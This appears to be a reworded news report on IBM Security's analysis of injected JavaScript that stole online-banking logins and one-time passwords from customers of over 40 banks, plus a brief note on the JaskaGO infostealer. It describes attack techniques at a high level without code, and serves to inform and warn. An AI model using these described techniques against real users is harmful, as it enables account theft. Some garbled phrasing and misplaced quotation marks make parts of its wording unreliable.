IBM Security analyzed JavaScript code that was injected into individuals’ online banking pages to steal their login credentials, saying 50,000 user sessions with more than 40 banks worldwide were compromised by the malware in 2023.
Judging by the available evidence, it appears that Windows malware DanaBot, or something related or connected to it, infects victims’ computers – usually through spam emails and other means – and then waits for the user to visit their bank’s website. At this point, the malware comes into play and injects JavaScript into the login page. This injected code runs on the browser page and intercepts the victim’s credentials as they are entered, which can be passed on to fraudsters to exploit to drain accounts.
The code was spotted attacking customers of dozens of financial organizations in North America, South America, Europe and Japan, according to IBM’s Tal Langus. reported this week.
The criminals behind this adventure purchased the domain names used by the JavaScript code in December 2022 and launched their web injection campaign shortly after. We’re told the theft of credentials continues today. The JS targets a web page structure that several banks use for their sites, and it appears it can also harvest multi-factor authentication tokens from brands.
When the requested banking page “contains a certain keyword and a login button with a specific ID present, new malicious content is injected,” Langus explained. “Credential theft is performed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it.”
The script is pretty clever: it communicates with a remote command and control (C2) server and deletes itself from the DOM tree – deletes itself from the login page, basically – once it has finished its work, which makes it difficult to detect. and analyze.
The malware can perform a series of harmful actions, based on an “mlink” flag sent by the C2. In total, the malware can perform nine different actions depending on the “mlink” value, we’re told.
These include injecting a prompt with the user’s phone number or a two-factor authentication token, which attackers can use along with the intercepted username and password to access the victim’s bank account and steal their money.
The script can also inject an error message on the login page stating that banking services will be unavailable for 12 hours. “This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with the opportunity to perform uninterrupted actions,” Langus said.
Other actions include injecting a page loading overlay as well as cleaning any injected content from the page.
“This sophisticated threat has advanced capabilities, including executing man-in-browser attacks, with its dynamic communication, web injection methods, and ability to adapt based on server and browser instructions. “current state of the page,” Langus warned. “Malware poses a significant threat to the security of financial institutions and their customers.”
He also urged bank customers to “be vigilant” with their banking apps. This includes using (and not reusing) strong passwords, not downloading software from unknown sources, and reporting any strange behavior to banks. Check out the article linked above for more technical information and some indicators of compromise, if you want to look for this particular malware. ®
PS: AT&T Alien Labs this week perforated in information-stealing malware called JaskaGO, written in Go and considered “a serious threat to Windows and macOS operating systems”. The code uses several techniques to persist on an infected computer and can siphon data, including login information stored by browsers, and attack cryptocurrency wallets. The telco also shared indicators of compromise if you want to find and destroy this malware.